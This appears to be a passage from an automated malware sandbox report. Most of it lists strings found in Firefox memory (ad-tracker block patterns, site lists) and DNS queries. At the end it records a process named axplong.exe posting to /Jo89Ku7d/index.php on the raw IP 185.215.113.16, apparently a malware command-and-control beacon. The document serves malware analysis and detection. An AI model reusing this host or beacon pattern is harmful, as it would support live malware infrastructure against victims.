"*://s.webtrends.com/js/webtrends.js", "*://s.webtrends.com/js/webtrends.min.js"], windowId
Source: firefox.exe, 00000015.00000002.2917321112.000002593A40F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3086366052.000001EF2EB9E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: [{incognito:null, tabId:null, types:["xmlhttprequest"], urls:["*://track.adform.net/Serving/TrackPoint/*", "*://pagead2.googlesyndication.com/pagead/*.js*fcd=true", "*://pagead2.googlesyndication.com/pagead/js/*.js*fcd=true", "*://pixel.advertising.com/firefox-etp", "*://cdn.cmp.advertising.com/firefox-etp", "*://*.advertising.com/*.js*", "*://*.advertising.com/*", "*://securepubads.g.doubleclick.net/gampad/*ad-blk*", "*://pubads.g.doubleclick.net/gampad/*ad-blk*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://vast.adsafeprotected.com/vast*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://securepubads.g.doubleclick.net/gampad/*ad*", "*://pubads.g.doubleclick.net/gampad/*ad*", "*://www.facebook.com/platform/impression.php*", "https://ads.stickyadstv.com/firefox-etp", "*://ads.stickyadstv.com/auto-user-sync*", "*://ads.stickyadstv.com/user-matching*", "https://static.adsafeprotected.com/firefox-etp-pixel", "https://static.adsafeprotected.com/firefox-etp-js", "*://*.adsafeprotected.com/*.gif*", "*://*.adsafeprotected.com/*.png*", "*://*.adsafeprotected.com/*.js*", "*://*.adsafeprotected.com/*/adj*", "*://*.adsafeprotected.com/*/imp/*", "*://*.adsafeprotected.com/*/Serving/*", "*://*.adsafeprotected.com/*/unit/*", "*://*.adsafeprotected.com/jload", "*://*.adsafeprotected.com/jload?*", "*://*.adsafeprotected.com/jsvid", "*://*.adsafeprotected.com/jsvid?*", "*://*.adsafeprotected.com/mon*", "*://*.adsafeprotected.com/tpl", "*://*.adsafeprotected.com/tpl?*", "*://*.adsafeprotected.com/services/pub*", "*://*.adsafeprotected.com/*"], windowId:null}, ["blocking"]] equals www.facebook.com (Facebook)
Source: firefox.exe, 00000015.00000002.2924708904.000002593AC08000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: `https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000015.00000002.2924708904.000002593AC08000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: `https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000015.00000002.2884763162.0000025934403000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://static.adsafeprotected.com/firefox-etp-jsC:\Program Files\Mozilla Firefox\browser\features*://id.rambler.ru/rambler-id-helper/auth_events.jsassemblePayloadWithMeasurements - caught exceptionresource://gre/modules/TelemetryScheduler.sys.mjssaveShutdownPings - failed to submit first shutdown pingassemblePayloadWithMeasurements/measurementsContainUtility<assemblePayloadWithMeasurements/payloadObj.lateWrites<saveShutdownPings - failed to submit saved-session pingresource://gre/modules/TelemetryTimestamps.sys.mjsassemblePayloadWithMeasurements/measurementsContainGPU<assemblePayloadWithMeasurements/payloadObj.addonDetails<toolkit.telemetry.shutdownPingSender.enabledFirstSessionsaveShutdownPings - failed to submit shutdown ping_onEnvironmentChange - throttling; last change was assemblePayloadWithMeasurements/payloadObj.slowSQL<assemblePayloadWithMeasurements/measurements.keyedScalars<datareporting.policy.dataSubmissionPolicyBypassNotificationassemblePayloadWithMeasurements/measurementsContainSocket<datareporting.policy.dataSubmissionPolicyNotifiedTimehttps://www.amazon.com/exec/obidos/external-search/*assemblePayloadWithMeasurements/payloadObj.fileIOReports<assemblePayloadWithMeasurements/measurements.histograms<datareporting.policy.dataSubmissionPolicyAcceptedVersionresource://gre/modules/addons/AddonSettings.sys.mjscolor-mix(in srgb, currentColor 25%, transparent)browser.engagement.session_time_excluding_suspendgetScalars - We only support scalars in subsessions.browser.engagement.session_time_including_suspendassemblePayloadWithMeasurements/measurements.keyedHistograms<_sendDailyPing - Failed to save the aborted session pingresource://gre/modules/TelemetryControllerBase.sys.mjsassemblePayloadWithMeasurements/measurements.scalars<linear-gradient(90deg, #9059FF 0%, #FF4AA2 52.08%, #FFBD4F 100%) equals www.rambler.ru (Rambler)
Source: firefox.exe, 00000015.00000002.2919695391.000002593A71C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2884763162.00000259344DF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3066712118.000001EF2C87C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://vk.com/,https://www.youtube.com/,https://ok.ru/,https://www.avito.ru/,https://www.aliexpress.com/,https://www.wikipedia.org/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000015.00000002.2944148777.0000025940561000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2938420212.0000025940103000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2924708904.000002593ACA8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000015.00000002.2963140351.00001F079B900000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.facebook.com/c equals www.facebook.com (Facebook)
Source: firefox.exe, 00000015.00000002.2910935393.00000259395ED000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2924708904.000002593ACA8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2923113526.000002593AB2C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000015.00000002.2919695391.000002593A71C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2884763162.00000259344DF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3066712118.000001EF2C87C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://allegro.pl/,https://www.wikipedia.org/,https://www.olx.pl/,https://www.wykop.pl/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000015.00000002.2919695391.000002593A71C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2884763162.00000259344DF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3066712118.000001EF2C87C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://allegro.pl/,https://www.wikipedia.org/,https://www.olx.pl/,https://www.wykop.pl/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000015.00000002.2919695391.000002593A71C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2884763162.0000025934473000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3066712118.000001EF2C87C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000015.00000002.2919695391.000002593A71C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2884763162.0000025934473000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3066712118.000001EF2C87C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 00000015.00000002.2919695391.000002593A71C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2884763162.0000025934473000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3066712118.000001EF2C87C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000015.00000002.2919695391.000002593A71C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2884763162.0000025934473000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3066712118.000001EF2C87C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000015.00000002.2919695391.000002593A71C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2884763162.0000025934473000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3066712118.000001EF2C87C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000015.00000002.2919695391.000002593A71C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2884763162.0000025934473000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3066712118.000001EF2C87C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000015.00000002.2919695391.000002593A71C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2884763162.0000025934473000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3066712118.000001EF2C87C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000015.00000002.2919695391.000002593A71C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2884763162.0000025934473000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3066712118.000001EF2C87C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000015.00000002.2919695391.000002593A71C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2884763162.0000025934473000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3066712118.000001EF2C87C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 00000015.00000002.2919695391.000002593A71C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2884763162.0000025934473000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3066712118.000001EF2C87C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000015.00000002.2919695391.000002593A71C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3066712118.000001EF2C87C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000015.00000002.2919695391.000002593A71C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3066712118.000001EF2C87C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 00000015.00000002.2919695391.000002593A71C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3066712118.000001EF2C87C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000015.00000002.2919695391.000002593A71C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3066712118.000001EF2C87C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/L equals www.facebook.com (Facebook)
Source: firefox.exe, 00000015.00000002.2919695391.000002593A71C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3066712118.000001EF2C87C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/L equals www.twitter.com (Twitter)
Source: firefox.exe, 00000015.00000002.2919695391.000002593A71C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3066712118.000001EF2C87C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/L equals www.youtube.com (Youtube)
Source: firefox.exe, 00000015.00000002.2884763162.0000025934473000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3055217724.000001EF29E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000015.00000002.2884763162.0000025934473000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3055217724.000001EF29E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 00000015.00000002.2884763162.0000025934473000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3055217724.000001EF29E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000015.00000003.2805571289.000002593B7FB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2919695391.000002593A71C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2884763162.0000025934473000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000015.00000003.2805571289.000002593B7FB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2919695391.000002593A71C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2884763162.0000025934473000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 00000015.00000003.2805571289.000002593B7FB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2919695391.000002593A71C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2884763162.0000025934473000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000015.00000002.2963140351.00001F079B900000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/Z equals www.youtube.com (Youtube)
Source: firefox.exe, 00000027.00000002.3086366052.000001EF2EB9E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: unified-extensions-context-menu-move-widget-downBackground service worker unregistered for "bgInstance exists before priming unified-extensions-context-menu-move-widget-upSearch with Google or enter addressbackground-script-suspend-ignored#unified-extensions-area > :last-childshowInstallConfirmation/unsigned<showInstallConfirmation/options.eventCallbackImport bookmarks& Cannot start multiple background instancesremoveAllNotifications/notifications<_shouldShowQuarantinedNotification/<extension-enable-process-spawningContext not found at startup completion..unified-extensions-item-action-buttonbound onExtensionEnableProcessSpawningextension-enable-process-spawningContext has unloaded before startup completion.extensions.background.idle.enabledbackground-script-suspend-canceledprimeBackground/bgStartupPromise<extension:background-script-statusresource://gre/modules/ExtensionParent.sys.mjsprimeBackground/extension.terminateBackgroundextensions.background.idle.timeout@mozilla.org/serviceworkers/manager;1primeBackground/extension.wakeupBackground.unified-extensions-item-menu-buttonshowInstallConfirmation/secondaryAction<disableRestartPersistentAfterCrashrestartPersistentBackgroundAfterCrash"https://smartblock.firefox.etp/play.svg"removeBootstrappedManifestLocation"*://login.microsoftonline.com/*"resource://gre/modules/SecurityInfo.sys.mjsTYPE_INTERNAL_WORKER_IMPORT_SCRIPTSwebRequest onAuthCancelled failure resource://gre/modules/ExtensionParent.sys.mjs@mozilla.org/network/http-activity-distributor;1ACTIVITY_SUBTYPE_TRANSACTION_CLOSE"*://www.everestjs.net/static/st.v3.js*"resource://gre/modules/WebRequest.sys.mjsresource://gre/modules/ExtensionDNR.sys.mjswebRequest onAuthAvailable failure TYPE_INTERNAL_WORKER_STATIC_MODULE@mozilla.org/webrequest/channel-event-sink;1asyncPromptAuth/wrapper.authPromptForward"*://cdn.branch.io/branch-latest.min.js*"webRequest asyncPromptAuth failure on service worker imported script "*://pub.doubleverify.com/signals/pub.js*"asyncPromptAuth/wrapper.authPromptCallback"*://c.amazon-adsystem.com/aax2/apstag.js"resource://gre/modules/ExtensionUtils.sys.mjsDisallowed change restricted response header Unable to set host header to restricted url."*://auth.9c9media.ca/auth/main.js"ACTIVITY_SUBTYPE_RESPONSE_COMPLETEresource://gre/modules/WebRequestUpload.sys.mjs"*://static.chartbeat.com/js/chartbeat.js"115062f8-92f1-11e5-8b7f-080027b0f7ec"https://smartblock.firefox.etp/facebook.svg""https://en.wikipedia.org/wiki/Special:Search*""*://static.chartbeat.com/js/chartbeat_video.js""*://static.criteo.net/js/ld/publishertag.js""*://*.imgur.io/js/vendor.*.bundle.js""*://www.rva311.com/static/js/main.*.chunk.js""*://connect.facebook.net/*/all.js*""*://www.googletagmanager.com/gtm.js*""*://ssl.google-analytics.com/ga.js""*://s0.2mdn.net/instream/html5/ima3.js""*://cdn.adsafeprotected.com/iasPET.1.js""*://static.adsafeprotected.com/iasPET.1.js""*://adservex.media.net/videoAds.js*""*://libs.coremetrics.com/eluminate.js""*://connect.facebook.net
Source: firefox.exe, 00000015.00000003.2815648543.00000259406CE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2915888122.000002593A2F7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2918105959.000002593A54F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: www.facebook.com equals www.facebook.com (Facebook)
Source: firefox.exe, 00000015.00000002.2963140351.00001F079B900000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: www.facebook.comZ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000015.00000003.2815648543.00000259406CE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2944981005.00000259406CE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2963140351.00001F079B900000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: www.youtube.com equals www.youtube.com (Youtube)
Source: firefox.exe, 00000015.00000002.2963140351.00001F079B900000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: www.youtube.comZ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000015.00000002.2918105959.000002593A51A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2915888122.000002593A2F7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2915888122.000002593A2CD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: x*://www.facebook.com/platform/impression.php* equals www.facebook.com (Facebook)
Source: firefox.exe, 00000027.00000002.3055217724.000001EF29EDA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: {incognito:null, tabId:null, types:["image"], urls:["*://track.adform.net/Serving/TrackPoint/*", "*://pixel.advertising.com/firefox-etp", "*://*.advertising.com/*.js*", "*://*.advertising.com/*", "*://securepubads.g.doubleclick.net/gampad/*ad-blk*", "*://pubads.g.doubleclick.net/gampad/*ad-blk*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://vast.adsafeprotected.com/vast*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://securepubads.g.doubleclick.net/gampad/*ad*", "*://pubads.g.doubleclick.net/gampad/*ad*", "*://www.facebook.com/platform/impression.php*", "https://ads.stickyadstv.com/firefox-etp", "*://ads.stickyadstv.com/auto-user-sync*", "*://ads.stickyadstv.com/user-matching*", "https://static.adsafeprotected.com/firefox-etp-pixel", "*://*.adsafeprotected.com/*.gif*", "*://*.adsafeprotected.com/*.png*", "*://*.adsafeprotected.com/*.js*", "*://*.adsafeprotected.com/*/adj*", "*://*.adsafeprotected.com/*/imp/*", "*://*.adsafeprotected.com/*/Serving/*", "*://*.adsafeprotected.com/*/unit/*", "*://*.adsafeprotected.com/jload", "*://*.adsafeprotected.com/jload?*", "*://*.adsafeprotected.com/jsvid", "*://*.adsafeprotected.com/jsvid?*", "*://*.adsafeprotected.com/mon*", "*://*.adsafeprotected.com/tpl", "*://*.adsafeprotected.com/tpl?*", "*://*.adsafeprotected.com/services/pub*", "*://*.adsafeprotected.com/*"], windowId:null} equals www.facebook.com (Facebook)
Source: firefox.exe, 00000027.00000002.3055217724.000001EF29EDA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: {incognito:null, tabId:null, types:["imageset"], urls:["*://track.adform.net/Serving/TrackPoint/*", "*://pixel.advertising.com/firefox-etp", "*://*.advertising.com/*.js*", "*://*.advertising.com/*", "*://securepubads.g.doubleclick.net/gampad/*ad-blk*", "*://pubads.g.doubleclick.net/gampad/*ad-blk*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://vast.adsafeprotected.com/vast*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://securepubads.g.doubleclick.net/gampad/*ad*", "*://pubads.g.doubleclick.net/gampad/*ad*", "*://www.facebook.com/platform/impression.php*", "https://ads.stickyadstv.com/firefox-etp", "*://ads.stickyadstv.com/auto-user-sync*", "*://ads.stickyadstv.com/user-matching*", "https://static.adsafeprotected.com/firefox-etp-pixel", "*://*.adsafeprotected.com/*.gif*", "*://*.adsafeprotected.com/*.png*", "*://*.adsafeprotected.com/*.js*", "*://*.adsafeprotected.com/*/adj*", "*://*.adsafeprotected.com/*/imp/*", "*://*.adsafeprotected.com/*/Serving/*", "*://*.adsafeprotected.com/*/unit/*", "*://*.adsafeprotected.com/jload", "*://*.adsafeprotected.com/jload?*", "*://*.adsafeprotected.com/jsvid", "*://*.adsafeprotected.com/jsvid?*", "*://*.adsafeprotected.com/mon*", "*://*.adsafeprotected.com/tpl", "*://*.adsafeprotected.com/tpl?*", "*://*.adsafeprotected.com/services/pub*", "*://*.adsafeprotected.com/*"], windowId:null} equals www.facebook.com (Facebook)
Source: firefox.exe, 00000027.00000002.3086366052.000001EF2EB9E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: {incognito:null, tabId:null, types:["xmlhttprequest"], urls:["*://track.adform.net/Serving/TrackPoint/*", "*://pagead2.googlesyndication.com/pagead/*.js*fcd=true", "*://pagead2.googlesyndication.com/pagead/js/*.js*fcd=true", "*://pixel.advertising.com/firefox-etp", "*://cdn.cmp.advertising.com/firefox-etp", "*://*.advertising.com/*.js*", "*://*.advertising.com/*", "*://securepubads.g.doubleclick.net/gampad/*ad-blk*", "*://pubads.g.doubleclick.net/gampad/*ad-blk*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://vast.adsafeprotected.com/vast*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://securepubads.g.doubleclick.net/gampad/*ad*", "*://pubads.g.doubleclick.net/gampad/*ad*", "*://www.facebook.com/platform/impression.php*", "https://ads.stickyadstv.com/firefox-etp", "*://ads.stickyadstv.com/auto-user-sync*", "*://ads.stickyadstv.com/user-matching*", "https://static.adsafeprotected.com/firefox-etp-pixel", "https://static.adsafeprotected.com/firefox-etp-js", "*://*.adsafeprotected.com/*.gif*", "*://*.adsafeprotected.com/*.png*", "*://*.adsafeprotected.com/*.js*", "*://*.adsafeprotected.com/*/adj*", "*://*.adsafeprotected.com/*/imp/*", "*://*.adsafeprotected.com/*/Serving/*", "*://*.adsafeprotected.com/*/unit/*", "*://*.adsafeprotected.com/jload", "*://*.adsafeprotected.com/jload?*", "*://*.adsafeprotected.com/jsvid", "*://*.adsafeprotected.com/jsvid?*", "*://*.adsafeprotected.com/mon*", "*://*.adsafeprotected.com/tpl", "*://*.adsafeprotected.com/tpl?*", "*://*.adsafeprotected.com/services/pub*", "*://*.adsafeprotected.com/*"], windowId:null} equals www.facebook.com (Facebook)
Source: global traffic DNS traffic detected: DNS query: prod.classify-client.prod.webservices.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: youtube.com
Source: global traffic DNS traffic detected: DNS query: detectportal.firefox.com
Source: global traffic DNS traffic detected: DNS query: prod.detectportal.prod.cloudops.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: example.org
Source: global traffic DNS traffic detected: DNS query: ipv4only.arpa
Source: global traffic DNS traffic detected: DNS query: contile.services.mozilla.com
Source: global traffic DNS traffic detected: DNS query: spocs.getpocket.com
Source: global traffic DNS traffic detected: DNS query: prod.ads.prod.webservices.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: prod.balrog.prod.cloudops.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: content-signature-2.cdn.mozilla.net
Source: global traffic DNS traffic detected: DNS query: prod.content-signature-chains.prod.webservices.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: shavar.services.mozilla.com
Source: unknown HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: firefox.exe, 00000015.00000002.2879062103.000002592835D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2887012398.0000025935240000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000015.00000002.2898849681.000002593826C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2919125459.000002593A65E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000002.2867357844.000002ADC1560000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2866695499.000001CBE7900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000027.00000002.3049658732.000001EF1DF6D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3083282313.000001EF2E549000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://127.0.0.1:
Source: axplong.exe, 00000006.00000003.3263828308.0000000001506000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000006.00000002.3288889656.0000000001506000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/
Source: axplong.exe, 00000006.00000003.3263828308.0000000001506000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000006.00000002.3288889656.0000000001506000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/3405117-2476756634-10039
Source: axplong.exe, 00000006.00000003.3263828308.0000000001506000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000006.00000002.3288889656.0000000001506000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/G
Source: axplong.exe, 00000006.00000002.3288889656.0000000001530000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000006.00000002.3288889656.0000000001488000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php
